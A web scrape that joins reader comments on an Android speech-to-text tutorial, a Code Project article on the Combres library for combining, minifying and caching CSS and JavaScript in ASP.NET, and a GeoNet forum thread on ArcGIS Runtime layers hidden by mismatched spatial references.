please suggest me and also which supporting files and are needed to run this application, reply me as fast as possible sir please. Nice coding.. 100 % working i want the opposite tts arabic – text arabic to speech – have you solution Hi im having some problems , when im creating the layout this problem appear: @string/speak: No source found that matches the given name. this source code is very understandable.thank you hi, Can anybody confirm me that this code works in offline mode…. for me its working fine in online but when iam trying in offline mode.. it does’t work….. when i went through the code there is no option indicating that internet is required?… so i think this should work in offline….pls suggest …. any references which work in offline…. Thanks Aravind Hello sir thanks for the tutorial…I encounter a problem where when I speak to the device then it load of something..after that the textview area doesn’t show up..any idea why?? im using samsung galaxy mini looking forward for your respond..thank you :) THank u Thanks Viral. Its Nice Tutorial. It works perfectly on real android device. Good Luck. Will Android Speech take pre-recorded audio? i want speech to text conversion in java please help me how do i change my pacakage name…..net.viralpatel.android.speechtotextdemo thanq …u helped me While i m trying this app in emulator it is showing the toast message “your device doesn’t support speech to text”. May i know the reason? hello sir i am Dhruvika.i am mca final year student.in 5 th sem dessertation subject .my dessertation defination is speech to text in gujarti for android mobile.i have no idea how to add gujrati voice typing languge in mobile. IT GIVES NO MATCHES FOUND DIALOG……CAN ANYONE TELL ME WHY? Perfect. Tried it on my Note 3 and it is just perfect, and simple. Thanks android:src=”@android:drawable/ic_btn_speak_now”…….THIS LINE IS SHOW THE FOLLOWING ERROR IN ECLIPSE…..”@android:drawable/ic_btn_speak_now requires API level 3 (current min is 1)”…..HELP OUT ASAP Cara muito bom, simples e ótimo exemplo!!!!?
http://viralpatel.net/blogs/android-speech-to-text-api/
CC-MAIN-2015-32
refinedweb
1,389
57.47
Many web developers probably know about various website optimization techniques described in the YSlow documentation and Steve Souders' book. Most of these techniques are very simple, yet bring about huge difference to the downloading time of most web pages. As simple as they are, applying some of these rules again and again in all .NET web applications can easily become a tedious task. As I couldn't find an existing solution that meets my needs from the Internet, I went about implementing Combres (formerly known as Client-side Resource Combine Library), a very easy-to-use library which can be used to automate many steps that you would have to do yourself when applying certain optimization techniques in your MVC and Web Form ASP.NET applications. Add the following elements to your web.config file: You can use any path for the definitionUrl, as long as it is a partial ASP.NET path (i.e., starting with "~/"). You don't have to put it in the App_Data folder if you don't want to, but it's a good convention to put application data files there. definitionUrl In this example, the file combres.xml in the App_Data folder will be the configuration file for the Combres library. You might wonder why I chose to put configuration settings in yet another file instead of leveraging the existing web.config file. The reason is that any change to web.config forces an application restart, and I don't think anybody would want to have such a time-consuming process take place just because they make simple changes to their CSS and JavaScript files, like renaming a file, or moving it to another folder. Let's look at a sample Combres configuration file, and I'll explain what each element and attribute means. The above file (optionally) defines the list of filters to be used to extend the standard behaviors of Combres. I'll explain what filters are later; for now, just forget about them for a minute. The most important thing in the Combres configuration file is the resource sets definition. As I mentioned earlier, you can organize your JavaScript and CSS files into separate resource sets. This sample configuration file defines three resource sets: a CSS set and two JavaScript sets (notice the value of the type attribute of the resourceSet element). There is, of course, no limit to the number of resource sets you can define. type resourceSet Each resource set contains one or more resources of the same type (CSS or JavaScript). All these files are to be combined, minified, gzipped, and cached together, as well as requested in one single HTTP request. Let's look at the attributes of the resourceSet element: name duration defaultDuration resourceSets version defaultVersion debugEnabled false true defaultDebugEnabled Now, let's look at the attributes of the resource element. resource path mode Remote LocalDynamic LocalStatic Notice the attribute URL in the element resourceSets. Whatever value you specify here will be used by the ASP.NET routing engine to map with the Combres processing pipeline. In the example, I use combres.axd although you can use any name and extension (as long as you configure IIS to route that extension to ASP.NET; the axd extension is already configured out of the box). The next thing you need to do is register that route with the ASP.NET routing engine. Depending on whether you're working on an ASP.NET MVC or an ASP.NET WebForms application, the steps are a little bit different. The routing module is registered by default for an ASP.NET MVC application, so there are only a few steps you need to do. In the routing registration routine in global.asax, invoke routes.AddCombresRoute("Combres"). (AddCombresRoute() is an extension method defined in a type in the Combres namespace, so you need to import the Combres namespace into your global.asax, i.e., "using Combes".) Note that since I use the axd extension, I need to put the call before routes.IgnoreRoute("{resource}.axd/{*pathInfo}"), which is added by default by the ASP.NET MVC project template; otherwise, the routing engine will ignore our Combres route. routes.AddCombresRoute("Combres") AddCombresRoute() Combres using Combes routes.IgnoreRoute("{resource}.axd/{*pathInfo}") Combres is now ready to serve combined contents via the 'combres.axd' path. Next, in views that we need to use JS and CSS files, add the links to the resource sets. The following examples show an MVC view which uses two resource sets we defined in the configuration file: CombresUrl and CombresLink are extension methods defined in the Combres namespace, therefore import this namespace to your page first. CombresUrl generates only the URL, while CombresLink generates the full script or link tag, depending on the type of the resource set. This is the generated code: CombresUrl CombresLink Note the nice URLs generated: combres.axd is followed by the resource set name and its current version. Including version as part of the URL is one of the things Combres does in order to control the caching behavior of the client browser. That should be it. If you run your application and use tools like FireBugs to disassemble the HTTP request and response, say the request to the siteCss resource set, you'll see the following: siteCss There are a couple of things in the above screenshots that are worth noticing: As of ASP.NET 3.5 SP1, the routing module is not registered by default in the ASP.NET project template. Therefore, there are a number of steps you need to follow to register that module. There is a great step-by-step tutorial that shows you how to do this, so I won't repeat it here. Once the routing module is integrated into the ASP.NET pipeline, register the Combres route as follows: To use Combres in a ASPX web page, do as follows: WebExtensions is a type defined in the Combres namespace, therefore import this namespace to your page first. Things will work exactly the same with the ASP.MVC example above. WebExtensions Filter is a mechanism enabled by Combes to help developers add custom logic to the standard Combres' processing pipeline via means of intercepting key transformation phases. In order to implement a filter, you implement the ICombresFilter interface by overriding its three methods: ICombresFilter The diagram below shows how Combres interacts with filters during its processing pipeline, which is simplified in the diagram to show only the relevant parts. At each of the interception points, all the filters registered with Combres will be instantiated and invoked. Each of these filters has a chance to modify the output of the previous phase, and the modified content will be fed into the next phase. At each interception point, an instance of a filter type is instantiated on the fly and one of its methods is invoked, depending on the current phase. This invocation idiom is to make it easy to develop custom filters: you can have instance variables if you want to, and you don't have to consider thread-safety when implementing your filters. You also don't have to worry about performance (for using a lot of Reflection here), because Fasterflect, another library I developed to turn Reflection invocations into close-to-native invocations, is used internally by Combres. After developing a filter, you need to register it with Combres via the configuration file. (Now, you can refer back to the sample configuration file to look at the filters element.) Each filter needs to appear in a filter element with its type specified. filters filter Combres ships with two built-in filters: HandleCssVariablesFilter and FixUrlsInCssFilter. HandleCssVariablesFilter FixUrlsInCssFilter Let's look at what they do and how they are implemented. The idea of this filter comes from a blog post by Rory Neopoleon. Basically, it allows you to define variables in CSS files. For example, you can have a CSS with the following @define block: @define @define { boxColor: #345131; boxWidth: 150px; } p { color: @boxColor; width: @boxWidth; } The filter will turn the content into the following: p { color: #345131; width: 150px; } This simple technique is a great way to refactor your CSS files. Let's look at the implementation of this filter. public class HandleCssVariablesFilter : ICombresFilter { public string TransformSingleContent(Settings settings, Resource resource, string content) { if (resource.ParentSet.Type != ResourceType.CSS) return content; // Remove comments because it may mess up the result content = Regex.Replace(content, @"/\*.+?\*/", "", RegexOptions.Singleline); var regex = new Regex(@"@define\s*{(?<define>.*?)}", RegexOptions.Singleline); var match = regex.Match(content); if (!match.Success) return content; var value = match.Groups["define"].Value; var variables = value.Split(';'); var sb = new StringBuilder(content); variables.ToList().ForEach(var => { if (string.Empty == var.Trim()) return; var pair = var.Split(':'); sb.Replace("@" + pair[0].Trim(), pair[1].Trim()); }); // Remove the variables declaration, // it's not needed in the final output sb.Replace(match.ToString(), string.Empty); return sb.ToString(); } public string TransformCombinedContent(Settings settings, ResourceSet set, string content) { return content; } public string TransformMinifiedContent(Settings settings, ResourceSet set, string content) { return content; } } Note that TransformSingleContent() is overridden because we want this filter to work on a per CSS file basis. The other methods simply return the original input. Some might be scared by the amount of text manipulation done and its implication to performance. In reality, this is hardly a problem, thanks to the caching mechanism supported by Combres. Chances are that the processing is done once and the content is served from either the browser's or the server's cache for days or even months, depending on your configuration settings and how frequently you update your contents. TransformSingleContent() This is a neat filter that addresses a problem many users of Combres reported. The problem is that URLs referenced in CSS files are interpreted by browsers as relative to the location of the CSS file. Because of that, when Combres is used to serve CSS content, unless the Combres' registered route starts in the same folder as the CSS file (unlikely, given that you might have a lot of CSS files in different folders in your application), the browser might not be able to resolve the correct paths to the referenced URLs (which result in issues like images not being shown). The FixUrlsInCssFilter is built to fix this problem. Even more than that, it allows you to use the standard ASP.NET partial part, e.g., URLs starting with '~/'. For example, assume the path of the CSS file is ~/content/site.css, then the following transformations are done by the filter to each URL reference in the CSS file: Let's look at how the filter is implemented: public class FixUrlsInCssFilter : ICombresFilterreadonly { ILog Log = LogManager.GetLogger( System.Reflection.MethodBase.GetCurrentMethod().DeclaringType); public string TransformSingleContent(Settings settings, Resource resource, string content) { if (resource.ParentSet.Type == ResourceType.CSS) return Regex.Replace(content, @"url\((?<url>.*?)\)", match => FixUrl(resource.Path, match), RegexOptions.IgnoreCase | RegexOptions.Singleline | RegexOptions.ExplicitCapture); return content; } private static string FixUrl(string cssPath, Match match) { try { const string template = "url(\"{0}\")"; var url = match.Groups["url"].Value.Trim('\"', '\''); if (url.StartsWith("/")) return string.Format(template, url); if (url.StartsWith("~")) return string.Format(template, url.ResolveUrl()); var cssFolder = cssPath.Substring(0, cssPath.LastIndexOf("/")); var backFolderCount = Regex.Matches(url, @"\.\./").Count; for (int i = 0; i < backFolderCount; i++) { url = url.Substring(3); // skip a '../' cssFolder = cssFolder.Substring(0, cssFolder.LastIndexOf("/")); // move back 1 folder } return string.Format(template, (cssFolder + "/" + url).ResolveUrl()); } catch (Exception ex) { // Be lenient here, only log. After all, // this is just an image in the CSS file // and it should't be the reason to stop loading that CSS file. if (Log.IsWarnEnabled) Log.Warn("Cannot fix url " + match.Value, ex); return match.Value; } } public string TransformCombinedContent(Settings settings, ResourceSet set, string content) { return content; } public string TransformMinifiedContent(Settings settings, ResourceSet set, string content) { return content; } } In this article, I have shown how easy it is to use Combres to employ many website performance optimization techniques in your ASP.NET and ASP.NET MVC applications. I have also demonstrated the extensibility of Combres via the filtering mechanism. With this mechanism in place, you can easily extend Combres to fit your own needs. The source code of Combres comes with two sample applications, an ASP.NET MVC and an ASP.NET WebForm. You can take the configuration and code in these samples to quickly get your web application up and running with Combres. I love to hear from you. Either post your comments here or in the project's discussion board at CodePlex..
https://www.codeproject.com/Articles/43424/Combres-WebForm-MVC-Client-side-Resource-Combine-L?msg=3257900
CC-MAIN-2017-43
refinedweb
2,086
56.45
JSR 286 : The Eventing feature By user13334247 on Aug 09, 2007. <portlet-app .....> <event-definition> <qname xmlns: x:Address.Create </qname> <value-type>com.test.Address</value-type> </event-definition> 1.2 In the portlet section, specify the event name defined above for those portlets that want to publish this event. <portlet> ................. <supported-publishing-event xmlns: x:Address.Create </supported-publishing-event> 1.3 In the portlet section, specify the event name defined above for those portlets that want to process this event. <portlet> ................. <supported-processing-event xmlns: x:Address.Create </supported-processing-event>. Any JSR-286 event payload class -- like Address in this example -- will need to be instrumented with a valid JAXB annotation, which, in this case, involves @XmlRootElement at the class level. BTW, Apache-Pluto's 1.1-286-COMPATIBILITY branch also implements eventing and most other JSR-286 features. This branch is the basis for the JSR-286 reference implementation. Posted by Craig Doremus on August 10, 2007 at 10:04 AM IST # To add flexibility to event processing, a javax.portlet.GenericPortlet subclass can annotate a method with the @ProcessEvent annotation that has a qname parameter. This method most conform to the following signature: void <methodname> (EventRequest, EventResponse) throws PortletException, IOException Posted by Craig Doremus on August 10, 2007 at 10:16 AM IST # Corrected.Thanks Posted by Deepak on August 10, 2007 at 03:54 PM IST # Hello Deepak Ji, I am really impressed with this article of yours and i want to know few things about Interportlet Communication like.. 1. Can one portlet communicate with the portlets of other WAR files? If can then please have some examples here. 2. How to successfully execute JSF portlet in JBoss Portal 2.0 . Please help me out.. Posted by Bimal Thapa on July 02, 2008 at 04:28 AM IST # Thanks Bimal Ji. 1. Yes one portlet can communicate with the portlets of other WAR files. I will upload the sample shortly and will let you know. You can also check this article( ) that explains various features of JSR 286 with examples. 2. I don't how to do it on JBoss Portal. You check this article( ) on executing JSF Portlet on OpenPortal Portlet Container. Posted by Deepak Gothe on July 02, 2008 at 05:21 AM IST # Thanks Deepak Ji, I am very much pleased with your response and will be waiting for the sample you will upload. Posted by Bimal Thapa on July 02, 2008 at 08:01 AM IST # I have question, how IPC should be used with the Portlet Bridge. How do I get handle to actionResponse() from normal faces application if I am using Portlet Bridge. Posted by Ganesh Puri on November 09, 2008 at 10:45 AM IST # As of now the Portlet Bridge does not support eventing. You need to subclass FacesPortlet and provide your implementation. Thanks. Posted by Deepak Gothe on November 11, 2008 at 04:14 AM IST # This jaxb think does not work for me at all. I have tried various ways of doing, such as the way you tell it should work, or something like: @XmlRootElement(name="event",namespace="") public class MyEvent implements Serializable{ and even followed the ibm instructions with the annotating the package-info.java look more here: And still, the only thing I can push through is a primitive such as java.lang.String. The exception I always get is the following: SEVERE: java.lang.IllegalArgumentException: The provided event value type org.mycom.MyEvent does not have a valid jaxb annotation SO I don't get it, but it does not has to be such a pain in the butt, this JAXB stuff. Do you have any suggestions? Posted by nik on March 20, 2009 at 09:25 AM IST # Hi, Just annotating like shown below should work. Also you should you have no-args constructor. Did you try the eventing samples @. Are you trying this with OpenPortal Portlet Container on GlassFish or you trying on Web Space server. @XmlRootElement public class MyEvent implements Serializable{ } Posted by Deepak Gothe on March 20, 2009 at 11:49 AM IST # Hallo Depak, thanx for the reply. The simple annotation @XmlRootElement public class MyEvent implements Serializable{ } ain't working that's for sure. I have tried it on JBoss Portal 2.7.1 and Liferay. My current guess is that this could be connected to JSF and RichFaces I am using. The only thing I can push through as an event object is a String. not even HashMap is working. The link you posted for me ain't working, I get error page. I have seen some other examples (Sun's included) of JSR 286 but those examples are with pure HTML! Who is using pure HTML today? It seems to me that JSR286 is released for it's own sake, and we developers are forwarded to the ice age of programming web. As already said. I can push a String through portlets, and as long that works I can get around for my needs, but that is not what it was meant to be, isn't it? Did Sun made the JSR 286 spec working only for OpenPortal Portlet Container on GlassFish. I will give it a try and see what happens. But my target environmen is pre given, so I can't just jump and tell the customers to start using GlassFish. Sad but true. Thanx any way. Posted by nik on March 20, 2009 at 01:13 PM IST # Hi, The JAXB annotation is basic and it should work. I am surprised that its not working. Sun's implementation of JSR 286 spec, i.e OpenPortal Portlet Container is part of Liferay and GlassFish Web Space server. The download from has a portlet driver which is used to test portlets and is meant for development purposes. It works both on GlassFish and Tomcat. If you want to try with Liferay you can use 5.2.2 and in portlet-ext.properties, set "portlet.container.impl=sun". If you are using Tomcat bundle, you need to set JVM as JDK1.6, as Tomcat does not support JAXB OOTB, while GlassFish does. The link that i sent was just samples, you can also check TourIPCPortlets from. And as far as JBoss is concerned, if you use JVM as JDK1.6, JAXB stuff should work. Posted by Deepak Gothe on March 21, 2009 at 03:27 PM IST # Hi Deepak, thanx for your reply. As I understand it now is that only Java 1.6 is my solution for the JAXB problem. I must use Java 1.5. As being so, I have had included the jaxb-api.2.1.9.jar in my class path. As the practice showed for me, it ain't working that way. Maybe I need additional JAR, I don't really know. What ever it is, I am stuck with basic String, and for now it will do it. What bother's me, is that I have seen examples, which use HashMap but even this ain't working for me. Anyways thank you very much for your effort replying me. Nik Posted by nik on March 23, 2009 at 09:44 AM IST # Hi Nik, You need to include both JAXB API and Impl in your classpath. This has to be in server classpath. HashMap(or any other Collection) is not a valid JAXB object. You need to use a custom class and add the Collection object as a field. Posted by Deepak Gothe on March 23, 2009 at 09:54 AM IST # Hi Deepak, thanx for your effort answering me. I admit,I did not include the IMP version of JAXB jar, but even when I did that now, it won't work. I tried it out wit Java 6 and it did work fine. That's where I stop experimenting. Since I am stuck with Java 1.5 I will have to make my way with simple String for the time being. For later I will see if we upgrade to Java 6. Kind greetings, Nik Posted by nik on March 25, 2009 at 12:50 PM IST # I am in same boat as Nik. Any one has any solution other than upgrading to 1.6 ? Appreciate your help in advance. thx Srinivas Posted by Srinivas Chamarthi on June 25, 2009 at 03:14 PM IST # For JAXB runtime you need: activation.jar, jaxb-api.jar, jaxb-impl.jar, jsr173_1.0_api.jar. You can get these from. Posted by Deepak on June 26, 2009 at 08:47 AM IST # Hmm.. didn't help. I debugged through jboss portal code and found something strange happening, where as similar code in test class is working fine. Not sure whats wrong. This is always returning false with 1.5 boolean b = valueType.isAnnotationPresent(XmlRootElement.class); where as the same code is returning true with jdk1.6 but same code with 1.5.0_15 in standalone class is return true. public static void main(String args[]) { NavigationEvent value = new NavigationEvent(); Class<? extends Serializable> valueType = value.getClass(); boolean b = valueType.isAnnotationPresent(XmlRootElement.class); System.out.println(b); } Posted by Srinivas Chamarthi on June 27, 2009 at 04:22 PM IST # Did you copy the jars to the JBoss appserver classpath. Looks like JBoss Appserver may not be loading the JAXB jars that you have copied. As i am not well versed with JBoss, i am giving GlassFish example..in GF there is glassfish/lib and glassfish/domains/domain1/lib(i.e server classpath). The jars in glassfish/lib take precedence over jars in glassfish/domains/domain1/lib. Check what JBoss server says about JAXB support. Posted by Deepak on June 29, 2009 at 03:36 AM IST # Hmm thank you so much ! this did the trick, earlier i was bundling the jars with my application war. After moving to server lib, it worked like a charm. Thank you so much for help. However I have small doubt regarding the eventing, am trying to do something like this actionResponse.setRenderParameter("navaction","Test"); actionResponse.setEvent(QName,LoginEvent); somehow jboss behaves weird in this case. I dont see the render parameters in my controller method when I receive the event. Just want to know if response.setRenderParameter will apply parameters on the event ? Posted by Srinivas Chamarthi on July 02, 2009 at 04:09 PM IST # The render parameters that you set on actionResponse is available in the processEvent of that portlet, not in the processEvent of other portlet. Render parameters are private to a portlet. Posted by Deepak on July 03, 2009 at 05:02 AM IST # Thanks for these posts. I had the exact problem: java.lang.IllegalArgumentException: The provided event value type my.example.MyEvent does not have a valid jaxb annotation Just to be clear for others reading--the solution worked for me when I \*removed\* the jaxb jars (activation.jar, jaxb-api.jar, jaxb-impl.jar, jsr173_1.0_api.jar) from my war and \*only\* placed them in the jboss portal classpath ($JBOSS_HOME/server/default/lib/). Note also that it worked for me with Java 1.5. Posted by Spurgeon on October 08, 2009 at 06:23 PM IST # Hi Deepak, We have a new IBM websphere portal environment and trying to deploy our old WARs on this portal with all required jars on shared lib on the server. When we try to access these portlets then it gives us an error copied below. It looks an issue related to conflictng jars.In my shared library there are no duplicate jars. Kindly suggest the way to remove this error. Thanks, Gaurav java.lang.ClassCastException: org.apache.xerces.jaxp.SAXParserFactoryImpl incompatible with javax.xml.parsers.SAXParserFactory at javax.xml.parsers.SAXParserFactory.newInstance(Unknown Source) at org.apache.taglibs.standard.tlv.JstlBaseTLV.validate(JstlBaseTLV.java:152) at org.apache.taglibs.standard.tlv.JstlCoreTLV.validate(JstlCoreTLV.java:96) at com.ibm.ws.jsp.translator.visitor.validator.ValidateVisitor.validateTagLib(ValidateVisitor.java:1103) at com.ibm.ws.jsp.translator.visitor.validator.ValidateVisitor.visitJspRootStart(ValidateVisitor.java:486) at com.ibm.ws.jsp.translator.visitor.JspVisitor.processJspElement(JspVisitor.java:233) at com.ibm.ws.jsp.translator.visitor.JspVisitor.visit(JspVisitor.java:216) at com.ibm.ws.jsp.translator.JspTranslator.processVisitors(JspTranslator.java:127) at com.ibm.ws.jsp.translator.utils.JspTranslatorUtil.translateJsp(JspTranslatorUtil.java:253) at com.ibm.ws.jsp.translator.utils.JspTranslatorUtil.translateJspAndCompile(JspTranslatorUtil.java:120) at com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.translateJsp(AbstractJSPExtensionServletWrapper.java:512) at com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper._checkForTranslation(AbstractJSPExtensionServletWrapper.java:439) at com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.checkForTranslation(AbstractJSPExtensionServletWrapper.java:297) at com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.handleRequest(AbstractJSPExtensionServletWrapper.java:147) at com.ibm.ws.webcontainer.webapp.WebAppRequestDispatcher.include(WebAppRequestDispatcher.java:673) at com.ibm.ws.portletcontainer.core.impl.PortletRequestDispatcherImpl.include(PortletRequestDispatcherImpl.java:98) at com.ibm.ws.portletcontainer.core.impl.PortletRequestDispatcherImpl.include(PortletRequestDispatcherImpl.java:230) at com.tcs.dgmi.apps.portlet.hrms.leave.FinalJoiningReportPortlet.doView(FinalJoiningReportPortlet.java:126) at javax.portlet.GenericPortlet.doDispatch(GenericPortlet.java:328) at javax.portlet.GenericPortlet.render(GenericPortlet.java:233) Posted by guest on October 12, 2011 at 12:39 PM IST # Did you try IBM's forum? From the exception it looks like you may have xerces jar in your webapp or in the shared lib. Try removing that and retry. Posted by Deepak on October 12, 2011 at 04:38 PM IST # I dont have this jar in Application library.Still i have the same issue Kindly help Thanks, Gaurav Posted by guest on October 13, 2011 at 05:38 AM IST # I dont have this jar in Application library.Still i have the same issue Kindly help Thanks, Gaurav Posted by Gaurav on October 13, 2011 at 11:11 AM IST # Did you try IBM's forum? It looks like same jar at different places like webapp level or application level or server level. Posted by Deepak on November 17, 2011 at 03:27 AM IST # Hi i tried the jsr 286 eventing feature myself as well as downloaded few samples from internet but none of them are abe to call processAction(). is there anything that need to be enabled to use this feature? Posted by guest on November 23, 2011 at 12:47 PM IST # During eventing processAction() is not called processEvent() is called. When you do any action on the portlet, processAction() is called and from processAction() you need to call setEvent in order for processEvent() to get called as explained in this blog. Posted by Deepak on November 24, 2011 at 03:35 AM IST # Hi. I realize this is a very old thread. However, I'm having a similar issue with portlet events. Getting this exception: javax.xml.bind.JAXBException: "com.opentext.itapps.csssite.events" doesnt contain ObjectFactory.class or jaxb.index I think it is the same issue some others have had with jaxb jar files in the portlet webapp. However, removing them is not an option because my portlet is using jaxb itself to unmarshall some rest/xml service calls. Does anyone know how to get around this? Posted by Clay Embry on January 24, 2012 at 07:16 AM IST # Why wont jaxb jars in the server classpath work?why do you need it in the webapp? Posted by Deepak on January 24, 2012 at 09:52 PM IST # Deepak, I will try that. Our portal is also deployed as a webapp in the same appserver and it also uses those jars. Do those need to be removed from the portal webapp as well? It's unfortunate that there is not another workaround as this makes an extra thing to remember for configuring and deploying the app server and portlet webapp when portlet uses events and jaxb. Thanks for your help. Posted by Clay on January 25, 2012 at 01:29 AM IST # Hi Deepak, As you mentioned that you will write an article for cross WAR eventing. Kindly share the path for the same if uploaded. I am using IBM Web Sphere Portal 6.1 Thanks, Gaurav Posted by Gaurav on February 07, 2012 at 12:05 PM IST #
https://blogs.oracle.com/deepakg/entry/jsr_286_eventing
CC-MAIN-2016-07
refinedweb
2,688
59.5
Once Upon A Time, A User Agent... Copyright © 2003 W3C® (MIT, ERCIM,. This document does not incriminate specific user agents. W3C does not generally track bugs or errors in implementations. That information is generally tracked by the vendors themselves or third parties. This document is an update of an already published. Though some of the previous comments has been added to this version. Some of them are still in discussion and might be added in a future version. We plan to publish in the next few months a new and improved version of this document to have the same organization than the CHIPS note. The problems related to XHTML, DOCTYPE and namespaces will be addressed in this future version.. This document explains some common mistakes in user agents (browsers, spiders, etc.) due to incorrect or incomplete implementation of specifications, and suggests remedies. It also suggests "good behavior" where specifications themselves do not specify any particular behavior (e.g., in the face of error conditions). This document only deals with the client-side aspect of HTTP, people looking for HTTP implementation problems in Web servers should have a look at the Web server counterpart of this document: Common HTTP Implementation Problems [CHIPS]. This document does not address accessibility issues for user agents. Please refer to W3C's User Agent Accessibility Guidelines 1.0 [UAAG10] for information on how to design user agents that are accessible to people with disabilities. This document is a set of known problems and/or good practices for user agents implementations and their use, aimed at: Unless specifically mentioned, what is referred throughout this document as HTTP is RFC2616, a.k.a. HTTP/1.1 [RFC2616]. This document is informative. This document has no conformance per se, but since it is about implementation of normative specifications (such as the HTTP/1.1 specification), or their use, one should consider following the guidelines and checkpoints described here as a good step toward conformance to these normative specifications. As often as possible,. This section focuses on the user's experience, including customization, user interface, and other usability issues. Some of the checkpoints suggested here depends on the user agents used and can be sometimes not applicable in terms of implementations. Techniques: References:: 1.3 Provide text messages 1. Ensure that every message (e.g., prompt, alert, or notification) that is a non-text element and is part of the user agent user interface has a text equivalent... References: HTTP/1.1 [RFC2616] allows transfer encoding. An example of encoding is data compression, which speeds up Web browsing over a slow connection. The HTTP/1.1 transfer encoding negotiation mechanism has been designed to avoid the need for the end user to get involved. Using the HTTP protocol, the server, proxy, and client implementations among themselves will be able to choose and use the most efficient transfer encoding. The more you support such mechanisms, the better it is. Users might have enough knowledge or have help of user interfaces to fine-tune this process beyond what can be done automatically. specify the language of its user interface as the preferred language, while allowing other languages with a lower preference, for example by sending Accept-Language: dk, *;q=0.5 References: Accept-Languageheader, see section 14.4 of the HTTP/1.1 specification, [RFC2616]. Accept-Languageheader, see section 15.1.4 of the HTTP/1.1 specification, [RFC2616]. Accept-encodingthat you really accept. A number of web sites suffer from bandwidth overload. By altering the server side scripting engine to support encoding compression or by inserting a compressing proxy, it is possible to dramatically reduce the operating costs. The down side is that a number of user agents advertise that they can handle gzip or deflate when they really are unable to do it. References: Accept-Encodingheader, see section 14.4 of the HTTP/1.1 specification, [RFC2616]. When the browser traverses a redirect, it should remember both the original URI and the target URI for marking links as visited. CSS NOT render the document with another guessed Content-Type (like, for example, text/html).. For example, the libwww implementation does it the right way and check the response time of all ip address, once done it sorts all the address to get the best one. An example is available in the open source implementation of the Domain Name Service Class.. Note: Some user agents send a Accept header that has '*/*' at the end, after all of the supported content types. This way, the server is free to send the resource in any format, which can then be processed by the user with another tool. editor would like to thank the following W3C Team members for the initial input that led to the creation of this document. Hugo Haas has been the main author of the first version of this document: The editor would also like to thank the following people for their review of the document:
http://www.w3.org/TR/2003/NOTE-cuap-20030128
crawl-002
refinedweb
826
57.47
Good Morning, I created my runtime content from ArcMap ( xxxx.geodatabase ). and try to create a desktop application that show my layers, but is look like the ArcGISTiledMapServiceLayer is overlapping my layers and I cannot see them. When I comment the ArcGISTiledMapServiceLa, my layers are showing up. I am using the code that is in the sample that comes with ArcGIS Runtime for .NET and is not working either. Any help will be very apreciated. Below is the code I am using: ( same from example: Feature Layer from Local Database in SRcGisRuntineSDKDotNet_DesktopSample ) <UserControl x:Class="ArcGISRuntimeSDKDotNet_DesktopSamples.Samples.FeatureLayerFromLocalGeodatabase" xmlns:esri="" xmlns:x="" xmlns: <Grid> <esri:MapView x: <esri:Map> <esri:ArcGISTiledMapServiceLayer </esri:Map> </esri:MapView> </Grid> <UserControl> namespace ArcGISRuntimeSDKDotNet_DesktopSamples.Samples { public partial class FeatureLayerFromLocalGeodatabase : UserControl { private const string GDB_PATH = @"C:\Data\Data.geodatabase"; public FeatureLayerFromLocalGeodatabase() { InitializeComponent(); } private void MyMapView_Loaded(object sender, RoutedEventArgs e) { CreateFeatureLayers(); } private async void CreateFeatureLayers() { try { var gdb = await Geodatabase.OpenAsync(GDB_PATH); Envelope extent = null; foreach (var table in gdb.FeatureTables) { var flayer = new FeatureLayer() { ID = table.Name, DisplayName = table.Name, FeatureTable = table }; if (!Geometry.IsNullOrEmpty(table.ServiceInfo.Extent)) { if (Geometry.IsNullOrEmpty(extent)) extent = table.ServiceInfo.Extent; else extent = extent.Union(table.ServiceInfo.Extent); } MyMapView.Map.Layers.Add(flayer); } await MyMapView.SetViewAsync(extent.Expand(1.10)); } catch (Exception ex) { MessageBox.Show("Error creating feature layer: " + ex.Message, "Samples"); } } } } Thank you JoseLuisCorral Solved! Go to Solution.. The basemap is covering your layer because of the drawing order. You should render the basemap prior to your layer. What exactly is the error that you're getting? If you're getting and error loading your sqlite geodatabase can you upload it? Thank you for your help. I am not getting any error loading my layers, the issue is that I don't see my layers bacause the basemap is overlaping or covering them. In the piece of code in my question, I am redering the basemap first and then in the event: MyMapView_Loaded(...) I loading my xxx.geodatabase to get my layers. This piece of code is exactly the same that ESRI distributed in the ArcGIS runtime for .NET sample code: ArcGisRuntimeSDKDotNet_DesktopSamples. Even using their data the layers don't show up. If I comment the xaml: <esri:Map> <!--<esri:ArcGISTiledMapServiceLayer--> </esri:Map> I can see my layers. Thank you. Could you upload a zip of your sample and geodatabase so that I can take a quick look at it? Thank you for your answer. I have create a test project where I try to open a feacture layer after the basemap. How can I upload the zip file? Thank you. GeoNET should allow you to attach the code in a response if you use the advanced editor. I don't believe I have access to the map service you're using in your code, so I'm going to make assumptions based on the what I've seen in the code. So far it appears that the spatial reference of your map is set to 4326 (i.e. WGS84), whereas the layer you're adding from your mobile geodatabase uses 4269 (i.e. GCS NAD83). As per the documentation, "Your tables in the geodatabase must be in the same spatial references as the map you are adding them to because on-the-fly reprojection of data from these tables is not supported." I believe that this is why you're unable to see the second layer you've added to the map. Could you check the REST endpoint of your service to verify its coordinate system? Spatial References Hi Jose, I've written up a quick sample to show what I believe you're running into. An image of the results is shown below. The image displays side by side maps within a Runtime for .NET application. The maps contain three layers. 1) ArcGIS Online Basemaps (left uses Web Mercator projection and right uses WGS84 projection) 2) FeatureLayer from Mobile Geodatabase (both use Web Mercator projection) 3) Graphics Layer When you run the application you'll notice that the FeatureLayer (the green polygon minus the red outline) only fails to display in the map that has a different coordinate system than the table in the mobile geodatabase. This is what the documentation is stating is an expected behavior..
https://community.esri.com/t5/arcgis-runtime-sdk-for-net-questions/arcgisruntimesdkdotnet-desktopsamples-error/td-p/95422
CC-MAIN-2022-27
refinedweb
709
50.73
